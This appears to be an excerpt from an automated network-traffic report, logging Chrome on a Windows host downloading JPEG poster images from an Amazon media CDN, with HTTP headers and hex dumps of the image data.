                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: f8 fb e7 d0 5d cc 24 5e 9b 7b 71 9f c7 dd c7 9c ce c7 61 bf 4e 38 be bd ad fc 9a 75 22 a7 31 57 30 fc 06 c1 b0 e6 75 1a ff 00 a2 c9 ff 00 6b 22 9f 52 c5 af 95 e4 b2 1b 34 35 85 24 7f 5c d6 7f 81 65 44 62 89 a7 20 a5 3c 74 d5 0a ca 71 3e 6a 13 55 e5 35 0f 02 56 56 ae 0d 8f bf 2c 9e 44 b3 1d b7 e4 0f 2d 42 b3 4d 46 4a 58 60 d9 b6 10 ed 53 f0 65 6d af fc 9a 6b 5f 9d 8d b0 1c b6 c7 c1 ba a8 3e 66 a7 a9 f7 c3 89 fc b7 92 47 f2 de 7c 5b 60 77 66 14 75 26 a5 55 47 f2 72 fd 70 b1 0a 41 d5 48 ed cf e5 1c 7e 23 ac 32 b6 67 f2 4f 85 12 fe a4 d7 73 cd 17 9a 1c 38 3d 52 c2 31 3f 93 b7 25 a7 f2 b6 60 83 fc 9d 86 c1 64 5e a7 68 22 3e b6 e7 4c 18 21 98 ce df a8 44 e8 f5 ab 16 24 4d 47 e4 66 a6 b3 5b 90 67 eb 10 fc 3a 75 6b 65 98 63 a5 ad b1 85 ae b2 ed 16 ba fc 89 ac a1
                                                                                                                                                                                          Data Ascii: ]$^{qaN8u"1W0uk"R45$\eDb <tq>jU5VV,D-BMFJX`Semk_>fG|[`wfu&UGrpAH~#2gOs8=R1?%`d^h">L!D$MGf[g:ukec
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 81 71 30 ae 26 02 af b5 6a d0 36 3c 6e a1 69 e4 99 1c 56 25 89 2d 66 6b 11 61 34 4b 34 5a 94 13 b5 a5 93 65 c5 8d 19 92 53 f5 06 0b 5a 1c 64 d6 71 e3 c6 39 47 33 3e 0d 4b 4d e7 18 13 45 36 7b e7 6c 3a f8 9b 3a 5c 25 37 d4 31 c7 9a cc 25 9f ad b3 4f 84 4a f9 b5 96 45 84 33 1d 89 af e2 e5 35 a5 af fa 93 66 a2 30 5f 9b ab 37 11 8c 7b b3 35 f6 61 63 b3 21 f0 65 8c 88 59 33 5e 4e c3 54 6c ac 6a 27 6a fa 87 15 e6 38 e5 53 62 c1 8e 31 5b 89 ad 60 09 70 39 1d a7 fd 2d 86 20 8a 67 bf 1c ea 99 e6 15 aa c4 c6 41 0e 2c 79 f1 36 08 a2 9e 38 73 d9 0e 76 6e 49 d2 f1 cf 24 99 d9 1a dc 87 2e 48 60 8c 96 e5 68 5f 2c 8c 7c 41 0c 18 b8 ba ac 33 37 32 27 b7 52 c9 13 e1 e2 ca 35 5c 67 e7 65 47 89 1e 9b 93 cb 87 19 4f 7e d6 12 89 b2 4a c6 04 c8 b5 c8 ef 10 2c 4f a5 66 70 6c e7
                                                                                                                                                                                          Data Ascii: q0&j6<niV%-fka4K4ZeSZdq9G3>KME6{l::\%71%OJE35f0_7{5ac!eY3^NTlj'j8Sb1[`p9- gA,y68svnI$.H`h_,|A372'R5\geGO~J,Ofpl
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: c3 92 a7 da a7 cf 97 b8 e6 0e 31 a0 0f 58 b6 e7 be 57 40 4c 8f 74 65 f8 8e 7c 10 c6 32 9e 00 6c 11 e1 42 22 6b e5 70 8c c5 9f 4a 31 31 7b e5 97 11 b1 98 9e 16 34 05 93 4a c3 8b b6 18 9d 33 f2 61 d9 3b 82 2c b2 02 aa 52 7f 15 d3 1b 79 04 2c 8e b3 13 5c 62 18 b8 d0 4d 23 67 8b 2c 62 34 b8 33 fa c3 36 30 38 44 1f 85 24 e3 0e 1f d7 62 88 c7 b1 bb a6 c3 7b 26 31 a7 74 b9 86 2b 63 19 38 bb 66 86 67 67 c6 64 88 4b 13 66 db 85 c3 1c d7 bd d9 0d 9b a3 4e e8 62 8e 3c ae 9c f1 14 6f 78 34 6d 59 a1 72 fa 0b a5 1a ca 0b 25 95 3c 97 d2 99 b1 92 4a 72 3a 10 12 3e 59 86 2f 72 61 1c 4d cc 6c b2 7c 76 63 c2 63 0f 99 d2 cf ba 18 c0 92 51 93 03 5e a7 ea 32 d8 8c 48 f7 be 16 04 cc ae cc 8f 8a 49 3f 06 ba 31 d3 8e e7 98 4e 4f 57 99 f2 bc 0c 3b 9d 93 40 ed 9f 4a b8 52 7f 15 81
                                                                                                                                                                                          Data Ascii: 1XW@Lte|2lB"kpJ11{4J3a;,Ry,\bM#g,b43608D$b{&1t+c8fggdKfNb<ox4mYr%<Jr:>Y/raMl|vccQ^2HI?1NOW;@JR
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 33 3b 0b 7d 94 37 b4 ec c0 db 42 ab 6d 73 ab 9d ab 3b 05 85 9f 08 e7 99 a2 ab 3c de e9 f9 19 da 73 eb 3d 9f 7c d9 61 8e 76 1f 29 8f d2 78 fd 0f 57 de ce f5 ff 00 44 d5 66 b5 a4 3e df 43 bd f8 d9 8a a4 5e 3f 43 a3 fd 1b 0f a3 62 2d 95 7b 29 7c ce bf fc 2f 9f d1 e4 07 0f a3 57 e7 8f d1 64 87 60 3e 7a 17 7e 3d 96 3f 24 7b 5c 33 6e b2 4f f3 41 0e c6 a4 6c b2 87 e7 b0 ce 92 97 64 65 d9 4b b3 d4 a9 9d 45 57 cf 0a 9f 27 49 db 77 61 af b0 96 3f 27 40 55 ca fc f2 ca a1 48 3b eb af 67 8f c8 55 91 aa 39 f5 54 03 e5 85 b4 cc 1d 86 bb 24 f7 e7 56 d0 ab f3 52 ce a7 cc d7 3f bc 79 0f a3 68 be db 2b f4 4a 8b 44 bb 00 78 59 09 e0 a0 37 1c 10 63 82 3b b7 b2 88 df 17 46 05 dd e0 22 f3 47 4e 21 ff 00 55 11 bc 0c ad f0 18 ee 51 1e b1 86 62 91 45 90 37 a8 8b 11 0e 4e d3 94 7a
                                                                                                                                                                                          Data Ascii: 3;}7Bms;<s=|av)xWDf>C^?Cb-{)|/Wd`>z~=?${\3nOAldeKEW'Iwa?'@UH;gU9T$VR?yh+JDxY7c;F"GN!UQbE7Nz
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: f2 e8 ba db 2e 50 06 0e da 9d 5e d4 f7 e1 64 95 e3 04 15 44 f0 c5 97 58 f0 b4 5f 8e 78 f3 29 fe 93 ff c4 00 27 10 00 02 02 01 03 03 05 01 01 01 01 00 00 00 00 00 01 11 00 21 31 41 51 61 10 71 81 91 a1 b1 c1 f0 d1 f1 e1 20 ff da 00 08 01 01 00 01 3f 21 68 0a 33 19 97 ff 00 95 d1 45 00 9a 8a ef 52 88 01 3c 10 78 f9 88 c1 0d 09 34 16 74 84 64 82 c1 90 c3 10 5b e3 da 36 d3 32 03 b9 50 5b 3e ea 06 26 dc 02 87 fb a5 f6 84 45 3f 77 88 48 18 28 d8 c6 d0 8e f8 cd 8a ef 01 b9 78 35 df 68 f1 33 61 ac 53 f0 7f 50 be 41 59 3d a2 c9 1a 5d ef 6f fb 10 d5 5b eb 2c 6a 6b bb b4 08 12 40 07 5e dd 0a c9 a7 fe c2 8b 98 14 f7 bf 68 dd 23 b8 99 a9 20 35 6f 17 01 16 f9 ff 00 53 67 f5 e2 2e bf 9c 69 0f f9 fc 45 e7 d0 07 f6 01 97 ee 79 87 1a 45 a9 6f ac 4c 28 35 fd ed 3f 70 fe 42
                                                                                                                                                                                          Data Ascii: .P^dDX_x)'!1AQaq ?!h3ER<x4td[62P[>&E?wH(x5h3aSPAY=]o[,jk@^h# 5oSg.iEyEoL(5?pB
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: d9 fb 88 73 b7 af cd 41 d3 08 3e 6b 3e 75 98 78 c7 d4 cd c9 37 9d 09 99 ee c4 b0 e0 4c d7 78 1f aa 0e 79 40 c1 a3 fc 84 83 cd 68 02 b4 8f c3 90 3c a1 a3 f3 30 5c 1c 71 35 3c e2 8d 82 26 30 15 41 80 82 51 9e 6c 06 3b 0b 09 c2 50 f7 fe 20 1d 03 42 46 6f 30 7f 89 0f 1e 02 24 5c b5 8f 24 f7 86 64 20 87 fc 50 aa 64 7b c1 fd da f4 ba 39 41 0e 2d fd 00 ea 34 03 b0 f8 9f bb 8e b8 84 0d ab 46 e7 44 01 79 3a e6 b1 72 ce 3f 7c 40 71 a0 24 b9 5f f5 19 97 43 e9 a7 a8 86 04 48 2e 41 d7 71 39 ba 83 63 fa c4 13 b5 1e 0d b8 15 46 70 9c fd cc 92 f8 67 f0 80 1d ed 16 77 f5 96 ce 59 81 90 a5 b1 df fc 9f 1d fe de 1a 20 8a 80 8a 1a 00 f1 c7 31 c9 88 40 4f f0 c7 d4 3b 5d 03 63 23 7b 8c 09 a6 31 a0 30 19 0c e2 dc 01 38 83 0c 42 09 43 53 08 59 98 cc cf 7e a0 ae 33 01 17 fc 3e 9c
                                                                                                                                                                                          Data Ascii: sA>k>ux7Lxy@h<0\q5<&0AQl;P BFo0$\$d Pd{9A-4FDy:r?|@q$_CH.Aq9cFpgwY 1@O;]c#{108BCSY~3>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          82192.168.2.1649815151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:10 UTC644OUTGET /images/M/MV5BMTkzNzM0NzY5OF5BMl5BanBnXkFtZTcwODgyMzk3NA@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:10 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31386
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 55999ae1-8456-4cf7-b6bb-27b86f342c1d
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 24 Mar 2011 18:49:15 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 08 Dec 2044 11:55:20 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 171770
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:10 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100024-IAD, cache-ewr-kewr1740053-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d8 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 06 07 03 08 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 61 ba 1f aa f3 35 0e c5 33 37 40 e0 4e
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4a537@N
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: a7 d3 f3 a0 aa dc 38 6e 3a 4e 81 3f e2 ef ad 45 cf 64 39 68 ec 68 77 1e f8 8d e3 49 4d 48 cb c0 c0 71 de d5 73 79 64 c3 cd da 5d de 49 70 aa c7 a5 a3 52 b1 4d db 7c 8e b7 a9 28 c8 6f 47 3a 32 25 fb 72 dd 65 df 56 b2 fa a2 b5 d2 e3 99 96 4f 9d f2 ab 34 7e 95 95 84 4b 85 8d 18 de ec 7b 95 ba 25 a7 8f 4c 57 ae 72 f7 ce 3b f2 dd da 93 31 9d 5b b4 4c 6e 65 1e 47 b9 15 01 5d d4 a8 c4 36 95 4c b9 1e 87 77 9c e9 92 34 aa bb ab cb 78 90 ad 4a 59 27 e7 cd 67 cd 8b 65 99 a0 5d 3a e7 9c 70 e7 1c ae b6 99 7c 6b 1d d4 ec 8c 22 17 25 db eb 06 6b bd 32 64 57 a0 98 6a 56 67 ad 53 11 a4 f7 77 d3 76 47 57 27 a0 b9 ea 52 91 3f 3e 2e 8f 7e 93 32 b9 9b 34 11 70 cd fd 35 96 98 15 aa 0d 9d ba a7 a1 30 8d 5e 49 fc c2 d9 1a 14 b3 5a 8a 1e 2d e8 4c 85 69 53 10 2e 74 7f a7 e3 1e 90
                                                                                                                                                                                          Data Ascii: 8n:N?Ed9hhwIMHqsyd]IpRM|(oG:2%reVO4~K{%LWr;1[LneG]6Lw4xJY'ge]:p|k"%k2dWjVgSwvGW'R?>.~24p50^IZ-LiS.t
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 9d 39 64 8f 45 45 20 15 89 21 76 d9 ad ba 19 5b 14 3f 88 bf 46 2d 16 47 40 f5 6f a4 c0 78 e2 7b 38 42 c3 0d 68 1f 7c e6 ac ad 9e 4b 38 50 2e a1 1f 25 e6 1a 49 76 5a e7 55 b9 59 80 c5 0f e2 0f a0 69 70 56 28 a8 5c c5 b9 27 11 bb 47 1c 26 ad 9a 3b 02 4d 49 7e 87 73 89 17 50 e2 2d 4c 77 79 3d 07 c0 91 b4 87 0b 1e 8d 70 cc 8a 6e a0 48 48 09 f5 47 c4 3d 5e 02 69 73 b0 c9 ed 6d e3 fc 86 f1 1f ec 79 af 38 39 85 8d aa dd 73 49 34 10 5a b7 33 45 71 95 85 d4 5d 01 89 c2 f5 45 2c 70 bd 84 c0 39 2d a3 18 99 c4 92 d8 5b d9 f0 bd 5e a3 5b 98 2d 20 86 70 f7 bc 49 a8 ab 87 5d ff 00 46 18 1e 73 b6 38 f4 09 bd e4 be d1 8d b4 7c ab 43 a0 f3 ec 9a 65 c3 f9 ae d6 08 ff 00 2f 3d b4 7f 8c 0b f7 0e 12 2d 31 24 92 21 71 15 8c 32 f7 89 14 eb c6 b3 0a 92 d4 f0 3c 15 a4 4a 9c 77 51
                                                                                                                                                                                          Data Ascii: 9dEE !v[?F-G@ox{8Bh|K8P.%IvZUYipV(\'G&;MI~sP-Lwy=pnHHG=^ismy89sI4Z3Eq]E,p9-[^[- pI]Fs8|Ce/=-1$!q2<JwQ
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 94 c9 8f 5a 7f f1 68 3e 7a 67 59 fc 49 43 60 f3 56 ba 92 46 30 66 d5 d3 fb 65 91 a5 62 cd 8a c5 62 b1 58 ac 56 2b 15 8a 02 b1 58 ac 56 2b 15 8a c5 48 df da 36 65 46 66 c4 6b 1a d6 f7 97 de 77 ca 2a 89 66 c0 0b 50 ce 80 6d 09 89 e3 c1 b2 77 56 30 3e ce 33 b2 b1 d1 25 75 f4 a8 01 7e e6 9c 1a 82 ef 89 b3 57 57 ad 72 00 3f 06 3a e2 b1 58 ac 50 42 c7 0b ff 00 34 28 8a c5 62 b1 d3 1d 16 5e 15 1b a1 b8 f4 3b 54 72 34 de b6 13 e0 a6 c8 71 26 77 5c c2 43 b1 a8 98 a3 64 35 e4 c8 3c e4 dc c1 97 ba 07 6c 46 bb f8 ab bf 8b eb b3 e0 66 94 b9 f3 50 8e 1d db 8e 65 57 01 10 a1 c5 21 6c 9a 1e 7e 0c 53 ba af 86 5b 66 9a 10 b2 ea 0a 61 8c 25 73 e2 26 5a 07 68 5c 36 f1 eb 5b 8d 8d e4 56 ff 00 18 ae 68 b6 1c 47 19 da 52 a4 88 ee c5 76 d2 fd 1c 7c 2c 45 5b e1 5d a4 a8 25 64 dd
                                                                                                                                                                                          Data Ascii: Zh>zgYIC`VF0febbXV+XV+H6eFfkw*fPmwV0>3%u~WWr?:XPB4(b^;Tr4q&w\Cd5<lFfPeW!l~S[fa%s&Zh\6[VhGRv|,E[]%d
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: a3 32 93 83 b7 28 e8 57 e7 9b bd aa e2 52 64 a8 2e c6 fd b5 05 96 4f 8e cd 60 45 69 56 5e 63 98 a7 8e 39 88 54 d8 f6 2c b2 3a 32 b2 fa 0e e9 7d 35 3c 6d 1b 15 65 66 cf a6 ea 16 5e 19 2a 6e 65 fb 16 e4 37 8a 6b e8 d0 9c f7 b1 63 35 dd 3c e7 10 cd 08 8a df 6d 38 dc cd 14 a4 15 f7 32 b3 0f 3f ac d5 8d a8 8f 2d 57 1b a4 98 46 b7 b0 72 45 b4 5b aa 2a 2f 1d 5c ed 3e 6b 3c 11 ee 10 c9 35 ce ed 8b 62 0f 99 52 25 8f ed cd 67 a3 ca 92 b5 38 11 b6 d5 dd d9 ba 4c b9 e5 b8 3c 1f 2e 09 10 a6 9d 7a ab 94 79 2d e3 9b cb 6d e2 67 47 b2 b4 d9 eb 6b b1 98 64 14 b7 8c b1 a1 af ea 0c 5b 12 dd db 19 3e 6d 59 d9 a3 0d d2 de dc 05 4e 33 57 36 e2 75 c1 9e dd e1 38 6b 1b 56 7f 34 06 3d b5 4f c0 f4 48 9f 8e 57 92 11 28 da d2 44 c5 88 ab 7b 1e dc 72 b2 26 c5 0b 42 3c 3b 3d 4b 18 91
                                                                                                                                                                                          Data Ascii: 2(WRd.O`EiV^c9T,:2}5<mef^*ne7kc5<m82?-WFrE[*/\>k<5bR%g8L<.zy-mgGkd[>mYN3W6u8kV4=OHW(D{r&B<;=K
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: de 2b 84 8c 66 48 55 51 8d 3f 8f 67 75 c1 15 c8 17 ed 05 f1 e1 60 2d 90 56 dc 54 c0 0c 61 5d 54 ae 4c be 18 56 f7 34 47 f9 1f f1 b1 85 2a 79 a7 00 1e 8b f5 51 c0 5a 13 6d f6 2e c7 e0 84 81 9c 97 50 72 1a 66 6f 14 4e 69 00 fd a6 17 c8 27 04 e4 4b 82 c6 b9 1c d1 f3 ef 90 2b 92 97 d4 7c cb 10 8c 50 23 6e 07 28 1e dc c6 b7 93 9e 8b fc 85 19 15 e9 14 5e 8b 13 f0 2b 6d f3 45 c9 a7 6c 02 68 c8 79 08 a5 90 50 60 7c 74 5f f6 02 71 e6 98 96 f0 bd b6 d3 ba 90 0a 40 7f 74 bf ec 3b 0f ed 63 55 f6 ea 9f ec d1 fc 59 ac f4 cd 66 b3 59 f8 b3 d7 35 9f e0 45 ed 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 94 55 d9 45 5d 8c 55 d8 c5 5d 8c 55 d8 c5 5d 8c 55 d8 c5 5d 8c 55 d8 c5 5d 8c
                                                                                                                                                                                          Data Ascii: +fHUQ?gu`-VTa]TLV4G*yQZm.PrfoNi'K+|P#n(^+mElhyP`|t_q@t;cUYfY5E]UE]UE]UE]UE]UE]UE]UE]UE]UE]UE]U]U]U]U]
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 47 41 55 c9 a5 47 f1 1f a6 3a 4c 7a b1 54 e5 f3 51 2e ba 52 dd 5b de 28 db 8a 23 d3 b6 7c 58 8f a5 fe 3d 36 8a 34 25 c2 25 d4 69 ae 09 f5 91 52 5b 7e 74 c9 6a 39 3d d2 cf 6d d5 8d 32 8a 28 8e 9e d4 56 65 1b 46 c7 e6 a2 db a5 1e 9d 25 ca 8d 2a 52 8a 92 a2 5d 3b 4a d5 11 8a 6e 9a 58 b2 c6 2b 2b 34 6d 14 19 a7 06 a5 78 4b 16 38 53 a1 46 b9 23 2e 31 74 58 f1 45 14 51 14 af 95 24 88 bb 1f 84 a2 b7 0b 4c ac 32 b0 db 4c a1 68 b6 28 24 52 63 d0 5f 6b b6 84 91 fb 2c bc 35 72 bf 0b 2b 1b 84 bf 47 d7 8d e1 61 0e 2e c4 9e 78 c3 45 09 73 9b cd 66 84 51 58 b2 b0 de 36 d1 45 79 21 f9 58 b3 76 21 ac d9 58 b1 fa 5e 5e 68 bc 5e 2c b2 cb 2c bc 59 78 b2 f3 7e 35 9b f6 57 fb 75 ff 00 2e fd 35 8b 2f dd 65 97 ed bf 7d fa 9a f0 ac a5 e8 b2 f2 cb f0 bf 65 61 f8 58 fc af 16 59 6f
                                                                                                                                                                                          Data Ascii: GAUG:LzTQ.R[(#|X=64%%iR[~tj9=m2(VeF%*R];JnX++4mxK8SF#.1tXEQ$L2Lh($Rc_k,5r+Ga.xEsfQX6Ey!Xv!X^^h^,,Yx~5Wu.5/e}eaXYo
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 76 d4 a2 c8 30 01 a5 18 72 99 4f 64 a1 56 58 1f 08 a9 45 cf d9 a2 3c 10 b2 d1 46 fa e2 3b 04 54 32 63 f3 ba 0b 2a 5f a9 8d f1 2b 20 36 bf 4f e8 9f 01 83 74 47 2f 59 b0 71 c6 49 e0 c4 d0 27 c7 f2 b1 a5 e7 c0 23 20 22 5c 1b 33 be 88 c0 46 af 33 e0 9c 3a 46 02 cd b2 7e 15 6e 97 b4 72 6d db 53 c3 65 d6 9b 8a 95 aa 9b 30 10 d5 8a b7 67 59 f4 0d fe e5 d8 ed 4a 97 63 bd 06 d6 ae 7c 07 ca 26 54 21 0f fb 56 59 fd c4 ab 3a 31 89 70 80 e0 ac cc 42 53 33 d6 9f f2 30 03 f3 94 1d 2b 84 27 be a9 96 7f 31 d2 77 ae 22 75 4d 00 c1 8b cd 9f aa cb 5a d4 c6 f8 95 90 1b 5e 6d f2 a2 7c 06 0d d0 ee f5 98 43 71 32 59 40 2d 75 44 ca 75 2e 0d 2e 25 5a 13 bd ba 5e 41 60 e0 6d 4f 58 5d be cc b8 28 ec 2e 19 16 70 aa 8c 4b 6f 3e 02 4a d3 ff 00 68 52 65 ae d5 91 c5 59 ba 8f 3c dd 7a b2
                                                                                                                                                                                          Data Ascii: v0rOdVXE<F;T2c*_+ 6OtG/YqI'# "\3F3:F~nrmSe0gYJc|&T!VY:1pBS30+'1w"uMZ^m|Cq2Y@-uDu..%Z^A`mOX](.pKo>JhReY<z
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: c9 da 8f c4 56 4d 9c 3e 88 c2 17 b7 49 be 30 d8 b4 9b da 6d 11 42 3c 49 59 2f 9a 48 0d c3 cd 4a 50 b7 d6 3e 4b 52 10 8f 5b e8 9b 31 7a 8f 48 d5 44 e9 43 6c 66 a2 23 ae 14 4f 89 6c da 56 e7 8e af df 64 ee 28 4c 5e b4 8e a1 14 28 86 63 31 45 d6 82 c9 e8 cb 44 a3 07 1a 01 f7 e2 9e 37 4d 57 ee 51 b9 4a c9 11 d9 55 7d 36 2a 7f 51 fa 7a a2 42 fe 90 5b 1a 23 5d 68 47 51 5f d1 08 72 4e 8f e6 12 3e 6b 4b 03 54 70 8c 3e e4 8c 8e 06 cc 0f d5 13 1d 51 29 d6 76 cd dc 17 17 18 72 54 5d 9c c2 79 af 42 ab 05 30 6a dc 54 21 6e 27 61 44 88 dd 27 8f 35 fd a8 15 5e 59 84 2f 6e 66 fc 55 cc 65 e4 84 00 bd 5d 66 58 dc 9b 26 56 fd bc 50 03 57 4b be 05 30 7c a7 c8 a3 00 13 ca 71 31 dc aa 27 1d ba b3 65 39 27 47 69 fb 82 3b 47 44 a9 13 f7 cf 92 12 fd b3 ee 57 8a de 61 9e 16 70 37
                                                                                                                                                                                          Data Ascii: VM>I0mB<IY/HJP>KR[1zHDClf#OlVd(L^(c1ED7MWQJU}6*QzB[#]hGQ_rN>kKTp>Q)vrT]yB0jT!n'aD'5^Y/nfUe]fX&VPWK0|q1'e9'Gi;GDWap7
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 9f 7f b7 92 37 a1 e3 ea 79 66 ea b6 38 a1 b7 b9 7f ed f7 94 2e bf 12 d0 9d 7e d5 39 de a5 1f 63 77 b4 28 23 d6 0b 04 14 b9 7a c7 a4 02 11 e5 af 35 0f 9c 15 c1 1d f8 f4 76 e2 81 30 7d 4e c3 dd ee 3a fd 41 9a ff 00 f2 bb 43 31 bb 6e 7f 2c fa a0 29 58 d6 b8 29 48 9e 4a 37 f7 f9 22 04 06 db e2 a7 c9 00 3d b1 fb a6 6b 96 a4 2f 3c d5 f9 a7 fe 56 08 c1 7d ca 08 2f 35 f7 28 fa d1 34 d5 44 3d c2 f3 e1 15 87 96 7f 3d 4b 15 8a b8 e6 fb 8a e6 be ea 84 a4 b0 1d ea e6 fa 83 c7 db ea aa f2 47 82 1c 73 9d cb eb 42 bb 39 86 62 a7 55 ad 4f 45 05 e4 11 cd 2f 70 ec e6 d5 9b 04 17 dd 16 bd 99 bc a9 98 78 ad 7d eb 5e bc e6 99 b0 2b 57 9a 0a 5e e3 80 e6 bc f1 5d a5 54 33 62 ae 5f 99 6b 95 50 c3 35 c4 73 cd ad 1e a2 bf 72 92 28 2d 15 31 c1 70 f6 fa f3 1f 54 71 f5 30 2b 1f 24 2b
                                                                                                                                                                                          Data Ascii: 7yf8.~9cw(#z5v0}N:AC1n,)X)HJ7"=k/<V}/5(4D==KGsB9bUOE/px}^+W^]T3b_kP5sr(-1pTq0+$+


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          83192.168.2.1649816151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:10 UTC429OUTGET /images/M/MV5BMGVhYmRlMjEtMTZhYy00ZTgyLWI5YzMtMTFmMzg2OWEwZWRhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:10 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 12690
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 790659e0-b3c1-4803-83c1-8a023b29a880
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 25 Jul 2016 19:45:55 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 12:13:50 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:10 GMT
                                                                                                                                                                                          Age: 851278
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100140-IAD, cache-ewr-kewr1740053-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
